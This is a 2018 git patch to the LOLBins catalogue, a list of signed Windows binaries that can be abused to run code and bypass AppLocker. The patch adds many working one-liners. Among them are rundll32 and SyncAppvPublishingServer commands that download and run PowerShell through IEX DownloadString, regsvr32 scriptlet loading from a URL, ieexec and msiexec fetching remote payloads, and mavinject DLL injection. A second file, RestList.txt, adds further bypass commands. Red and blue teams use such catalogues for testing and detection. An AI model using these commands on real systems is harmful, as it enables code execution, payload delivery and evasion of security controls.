From 2803e540ace0a27bcef0b2a378bd41ea465955f4 Mon Sep 17 00:00:00 2001
From: api0cradle
Date: Wed, 18 Apr 2018 13:17:49 +0200
Subject: [PATCH] Added some more
---
 LOLBins.md | 301 +++++++++++++++++++++++++++++++++++++++++++++++-
 RestList.txt | 318 +++++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 615 insertions(+), 4 deletions(-)
 create mode 100644 RestList.txt
diff --git a/LOLBins.md b/LOLBins.md
index 6ff63f8..1126fac 100644
--- a/LOLBins.md
+++ b/LOLBins.md
@@ -7,7 +7,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 ## Rundll32.exe
-* Functions: Execute code
+* Functions: Execute
 ```
 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
@@ -19,30 +19,323 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%
 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
 rundll32 shell32.dll,Control_RunDLL payload.dll
+
+rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
+
+rundll32.exe advpack.dll,RegisterOCX calc.exe
+
+rundll32.exe zipfldr.dll,RouteTheCall calc.exe
+
+rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
+
+rundll32.exe url.dll,OpenURL "C:\test\calc.url"
+
+rundll32.exe url.dll, FileProtocolHandler calc.exe
+
+rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
+
+rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
+
+rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,
 ```
 Acknowledgements:
-* @subtee
-
+* Casey Smith - @subtee
+* Jimmy - @bohops
+* Moriarty - @Moriarty_Meng
+* Adam - @hexacorn
 ## Regsvr32.exe
+
+* Functions: Execute
 ```
 regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
 ```
 Acknowledgements:
-* @subtee
+* Casey Smith - @subtee
 ## Msbuild.exe
+
+* Functions: Execute
 ```
 msbuild.exe pshell.xml
 ```
+
+Acknowledgements:
+* Casey Smith - @subtee
+
+
+
+## Regsvcs.exe
+
+* Functions: Execute
+
+```
+regsvcs.exe /U regsvcs.dll
+
+regsvcs.exe regsvcs.dll
+```
+
+Acknowledgements:
+* Casey Smith - @subtee
+
+
+
+## Regasm.exe
+
+* Functions: Execute
+
+```
+regasm.exe /U regsvcs.dll
+
+regasm.exe regsvcs.dll
+```
+
+Acknowledgements:
+* Casey Smith - @subtee
+
+
+
+## InstallUtil.exe
+
+* Functions: Execute
+
+```
+InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+```
+
+Acknowledgements:
+* Casey Smith - @subtee
+
+
+
+## mshta.exe
+
+* Functions: Execute
+
+```
+mshta.exe evilfile.hta
+```
+
+Acknowledgements:
+* ?
+
+
+
+## IEExec.exe
+
+* Functions: Execute
+
+```
+ieexec.exe http://x.x.x.x:8080/bypass.exe
+```
+
+Acknowledgements:
+* ?
+
+
+
+## PresentationHost.exe
+
+* Functions: Execute
+
+```
+Presentationhost.exe C:\temp\Evil.xbap
+```
+
+Acknowledgements:
+* Casey Smith - @subtee
+
+
+
+## Msiexec.exe
+
+* Functions: Execute
+
+```
+msiexec /quiet /i cmd.msi
+msiexec /q /i http://192.168.100.3/tmp/cmd.png
+```
+
+Acknowledgements:
+* Casey Smith - @subtee
+
+
+
+## CMSTP.exe
+
+* Functions: Execute
+
+```
+cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+* Nick Tyrer - @NickTyrer
+
+
+
+## Xwizard.exe
+
+* Functions: DLL hijack
+
+```
+xwizard.exe (xwizard.dll in same folder)
+```
+
+Acknowledgements:
+* Adam - @Hexacorn
+
+
+
+## odbcconf.exe
+
+* Functions: Execute
+
+```
+odbcconf -f file.rsp
+```
 Acknowledgements:
 * @subtee
+
+
+
+## Forfiles.exe
+
+* Functions: Execute
+
+```
+forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
+```
+
+Acknowledgements:
+* Eric - @vector_sec
+
+
+
+## SyncAppvPublishingServer.exe
+
+* Functions: Execute
+
+```
+SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
+```
+
+Acknowledgements:
+* Nick Landers - @monoxgas
+
+
+
+## InfDefaultInstall.exe
+
+* Functions: Execute
+
+```
+InfDefaultInstall.exe shady.inf
+```
+
+Acknowledgements:
+* Kyle Hanslovan - @kylehanslovan
+
+
+
+## Atbroker.exe
+
+* Functions: Execute
+
+```
+ATBroker.exe /start malware
+```
+
+Acknowledgements:
+* Adam - @hexacorn
+
+
+
+## WMIC.exe
+
+* Functions: Execute
+
+```
+wmic process call create calc
+
+wmic process get brief /format:"https://www.example.com/file.xsl
+
+wmic os get /format:"MYXSLFILE.xsl"
+
+wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
+```
+
+Acknowledgements:
+* Casey Smith - @subtee
+
+
+
+## Mavinject32.exe
+
+* Functions: Execute
+
+```
+MavInject32.exe /INJECTRUNNING
+
+MavInject32.exe 3110 /INJECTRUNNING c:\folder\evil.dll>
+```
+
+Acknowledgements:
+* Giuseppe `N3mes1s` - @gN3mes1s
+* Adam - @hexacorn
+
+
+
+## Runscripthelper.exe
+
+* Functions: Execute
+
+```
+runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
+```
+
+Acknowledgements:
+* Matt Graeber - @mattifestation
+
+
+
+## Control.exe
+
+* Functions: Execute
+
+```
+control.exe c:\windows\tasks\file.txt:evil.dll
+
+control.exe
+(Add registry in HKCU\Software\Microsoft\Windows\currentversion\controlpanel\CPLS to manipulate)
+```
+
+Acknowledgements:
+* Jimmy - @bohops
+
+
+
+## ie4unit.exe
+
+* Functions: Execute
+
+```
+ie4unit.exe -BaseSettings
+(copy out ie4unit.exe and ieuinit.inf - add SCT in the MSIE4RegisterOCX.Windows7 section)
+```
+
+Acknowledgements:
+* Jimmy - @bohops
+
+
+
diff --git a/RestList.txt b/RestList.txt
new file mode 100644
index 0000000..ebc1937
--- /dev/null
+++ b/RestList.txt
@@ -0,0 +1,318 @@
+FORMAT:
+
+## Name.exe
+
+* Functions:
+
+```
+```
+
+Acknowledgements:
+* @subtee
+
+
+
+## MSDT.exe
+
+`Open .diagcab package`
+
+Notes:
+
+* Links:
+ * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
+ * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
+
+
+
+## dfsvc.exe
+
+Missing Example
+
+Notes:
+
+* Links:
+ * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
+
+
+
+## 32. Pubprn.vbs
+
+`pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c662171a568/raw/709aff66095b7f60e5d6f456a5e42021a95ca802/test.sct`
+
+* Requires admin: No
+* Windows binary: Yes
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+
+* Links:
+ * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+ * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
+
+
+
+## 33. slmgr.vbs
+
+`slmgr.vbs`
+
+* Requires admin: No
+* Windows binary: Yes
+* Bypasses AppLocker Default rules: ?
+
+Notes: Requires registry keys for com object.
+
+* Links:
+ * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+ * https://www.youtube.com/watch?v=3gz1QmiMhss
+
+
+
+## 34. winrm.vbs
+
+`winrm quickconfig`
+
+* Requires admin: No
+* Windows binary: Yes
+* Bypasses AppLocker Default rules: ?
+
+Notes: Requires registry keys for com object.
+
+* Links:
+ * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+ * https://www.youtube.com/watch?v=3gz1QmiMhss
+
+
+
+
+
+
+
+## 43. CL_Invocation.ps1
+
+`. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1`
+`SyncInvoke [args]`
+
+* Requires admin: No
+* Windows binary: Yes
+* Bypasses AppLocker Default rules: Yes, as long as PowerShell version 2 is present
+
+Notes:
+Requires PowerShell version 2
+
+* Links:
+ * https://twitter.com/bohops/status/948548812561436672
+
+
+
+* Requires admin: No
+* Windows binary: Yes
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+Requires write access to a place that is allowed by AppLocker
+
+* Links:
+ * https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
+ * https://twitter.com/bohops/status/955659561008017409
+
+
+
+## 55. Visual Studio Tools for Office - .VSTO files
+
+```
+evilfile.vsto
+```
+
+* Requires admin: No
+* Windows binary: Yes
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+You need to build a solution using Visual Studio Tools for Office.
+User needs to confirm installation after executing.
+
+* Links:
+ * https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/
+
+
+
+
+## 56. Manage-bde.wsf
+
+```
+cscript c:\windows\system32\manage-bde.wsf
+```
+
+* Requires admin: No
+* Windows binary: Yes
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+Need to adjust comspec variable using: set comspec=c:\windows\system32\calc.exe
+
+* Links:
+ * https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
+ * https://twitter.com/bohops/status/980659399495741441
+
+
+# OTHER MICROSOFT SIGNED BINARIES
+
+## Bginfo.exe
+
+`bginfo.exe bginfo.bgi /popup /nolicprompt`
+
+* Requires admin: No
+* Windows binary: No
+* Bypasses AppLocker Default rules: No
+
+Notes:
+Will work if BGinfo.exe is located in a path that is trusted by the policy.
+
+* Links:
+ * https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
+ * https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/
+ * https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/
+
+
+
+
+## 21. msxsl.exe
+
+`msxsl.exe customers.xml script.xsl`
+
+* Requires admin: No
+* Windows binary: No
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+
+* Links:
+ * https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ * https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1
+ * https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
+ * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
+
+## 38. Winword.exe
+
+`winword.exe /l dllfile.dll`
+
+* Requires admin: No
+* Windows binary: Yes
+* Bypasses AppLocker Default rules: ?
+
+Notes: No commonly made DLL example file
+
+* Links:
+ * https://twitter.com/subTee/status/884615369511636992
+
+
+## 17. dnx.exe
+
+`dnx.exe consoleapp`
+
+* Requires admin: ?
+* Windows binary: No
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+
+* Links:
+ * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
+
+
+## cdb.exe
+
+`cdb.exe -cf x64_calc.wds -o notepad.exe`
+
+* Requires admin: ?
+* Windows binary: No
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+
+* Links:
+ * http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
+
+
+
+## 18. rcsi.exe
+
+`rcsi.exe bypass.csx`
+
+* Requires admin: ?
+* Windows binary: No
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+
+* Links:
+ * https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
+
+
+
+## 19. csi.exe
+
+Missing example
+
+* Requires admin: ?
+* Windows binary: No
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+
+* Links:
+ * https://web.archive.org/web/20161008143428/
+ * http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html
+
+
+
+## 27. te.exe
+
+`te.exe bypass.wsc`
+
+* Requires admin: No
+* Windows binary: No
+* Bypasses AppLocker Default rules: ?
+
+Notes: Can be used if the Test Authoring and Execution Framework is installed and is in a path that is whitelisted.
+Default location is: C:\program files (x86)\Windows Kits\10\testing\Runtimes\TAEF
+
+* Links:
+ * https://twitter.com/gN3mes1s/status/927680266390384640
+ * https://gist.github.com/N3mes1s/5b75a4cd6aa4d41bb742acace2c8ab42
+
+
+## 25. fsi.exe
+
+`fsi.exe c:\folder\d.fscript`
+
+* Requires admin: No
+* Windows binary: No
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+
+* Links:
+ * https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
+ * https://twitter.com/NickTyrer/status/904273264385589248
+ * https://docs.microsoft.com/en-us/dotnet/fsharp/tutorials/fsharp-interactive/
+
+
+## 40. Tracker.exe
+
+`Tracker.exe /d .\calc.dll /c C:\Windows\write.exe`
+
+* Requires admin: No
+* Windows binary: No
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+Part of Visual studio.
+Requires TrackerUI.dll present in 1028 subfolder.
+
+* Links:
+ * https://twitter.com/Sudhanshu_C/status/943011972261412864
+
+
+
+# OTHER NON-MICROSOFT BINARIES